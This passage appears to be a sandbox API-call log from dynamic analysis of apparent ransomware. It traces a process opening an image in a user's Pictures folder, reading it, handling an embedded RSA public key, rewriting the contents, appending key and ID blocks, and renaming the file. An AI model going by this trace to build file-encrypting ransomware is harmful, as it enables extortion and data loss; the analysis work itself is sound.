hHeap=0x620000) returned 1 [0239.324] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65233710, ftCreationTime.dwHighDateTime=0x1d5c5ca, ftLastAccessTime.dwLowDateTime=0xa3a983d0, ftLastAccessTime.dwHighDateTime=0x1d5c18e, ftLastWriteTime.dwLowDateTime=0xa3a983d0, ftLastWriteTime.dwHighDateTime=0x1d5c18e, nFileSizeHigh=0x0, nFileSizeLow=0x1eab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qtleeiZM0 T.gif", cAlternateFileName="QTLEEI~1.GIF")) returned 1 [0239.324] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\qtleeiZM0 T.gif") returned=".gif" [0239.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\qtleeiZM0 T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\qtleeizm0 t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.324] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=7851) returned 1 [0239.325] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.327] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1e85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.328] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.331] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1eab, lpOverlapped=0x0) returned 1 [0239.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.331] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.333] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.333] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.333] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.333] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.333] GetLastError () returned 0x0 [0239.333] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.333] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.333] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.333] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.333] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1eb0) returned 0x3b89cd0 [0239.334] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86798 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d40 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b867e0 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ce8 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d00 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d18 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.334] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ce8 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d00 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88d18 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.336] GetCurrentThreadId () returned 0x5b4 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88128 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.336] GetCurrentThreadId () returned 0x5b4 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ce8 [0239.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d00 [0239.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d18 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d48 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d60 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d90 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d78 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d60 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d00 [0239.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b867e0 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.340] WriteFile (in: hFile=0x644, lpBuffer=0x3b89cd0*, nNumberOfBytesToWrite=0x1ea6, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b89cd0*, lpNumberOfBytesWritten=0x39afb14*=0x1ea6, lpOverlapped=0x0) returned 1 [0239.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.341] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1eab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.341] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.341] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.341] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.341] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.341] CloseHandle (hObject=0x644) returned 1 [0239.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393a30 | out: hHeap=0x620000) returned 1 [0239.351] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\qtleeiZM0 T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\qtleeizm0 t.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 